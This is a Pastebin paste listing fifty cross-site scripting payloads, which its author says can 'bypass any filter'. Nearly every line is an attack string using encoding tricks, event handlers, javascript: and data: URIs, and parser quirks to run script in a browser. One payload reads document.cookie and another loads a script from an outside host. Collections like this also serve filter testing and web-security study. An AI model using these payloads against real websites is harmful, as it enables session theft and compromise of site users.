SHARE
TWEET

Untitled

a guest Nov 10th, 2012 6,889 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these full baked vectors :-)
  2.  
  3. 1) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  4.  
  5. 2) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  6.  
  7. 3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  8.  
  9. 4) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  10.  
  11. 5) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ​
  12.  
  13. 6) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">​
  14.  
  15. 7) <var onmouseover="prompt(1)">On Mouse Over</var>​
  16.  
  17. 8) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  18.  
  19. 9) <img src="/" =_=" title="onerror='prompt(1)'">
  20.  
  21. 10) <%<!--'%><script>alert(1);</script -->
  22.  
  23. 11) <script src="data:text/javascript,alert(1)"></script>
  24.  
  25. 12) <iframe/src \/\/onload = prompt(1)
  26.  
  27. 13) <iframe/onreadystatechange=alert(1)
  28.  
  29. 14) <svg/onload=alert(1)
  30.  
  31. 15) <input value=<><iframe/src=javascript:confirm(1)
  32.  
  33. 16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
  34.  
  35. 17) http://www.<script>alert(1)</script .com
  36.  
  37.  
  38. 18) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>​
  39.  
  40. 19) <svg><script ?>alert(1)
  41.  
  42. 20) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  43.  
  44. 21) <img src=`xx:xx`onerror=alert(1)>
  45.  
  46. 22) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  47.  
  48. 23) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>​
  49.  
  50. 24) <math><a xlink:href="//jsfiddle.net/t846h/">click
  51.  
  52. 25) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>​
  53.  
  54. 26) <svg contentScriptType=text/vbs><script>MsgBox+1
  55.  
  56. 27) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  57.  
  58. 28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  59.  
  60. 29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  61.  
  62. 30) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  63.  
  64. 31) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script​​​​​​​​​​​​
  65.  
  66. 32) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  67.  
  68. 33) <script>+-+-1-+-+alert(1)</script>
  69.  
  70. 34) <body/onload=&lt;!--&gt;&#10alert(1)>
  71.  
  72. 35) <script itworksinallbrowsers>/*<script* */alert(1)</script ​
  73.  
  74. 36) <img src ?itworksonchrome?\/onerror = alert(1)​​​
  75.  
  76. 37) <svg><script>//&NewLine;confirm(1);</script </svg>
  77.  
  78. 38) <svg><script onlypossibleinopera:-)> alert(1)
  79.  
  80. 39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  81.  
  82. 40) <script x> alert(1) </script 1=2
  83.  
  84. 41) <div/onmouseover='alert(1)'> style="x:">
  85.  
  86. 42)  <--`<img/src=` onerror=alert(1)> --!>
  87.  
  88. 43) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>​
  89.  
  90. 44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>​
  91.  
  92. 45) "><img src=x onerror=window.open('https://www.google.com/');>
  93.  
  94. 46) <form><button formaction=javascript&colon;alert(1)>CLICKME
  95.  
  96. 47) <math><a xlink:href="//jsfiddle.net/t846h/">click
  97.  
  98. 48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>​
  99.  
  100. 49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  101.  
  102. 50) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>​
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top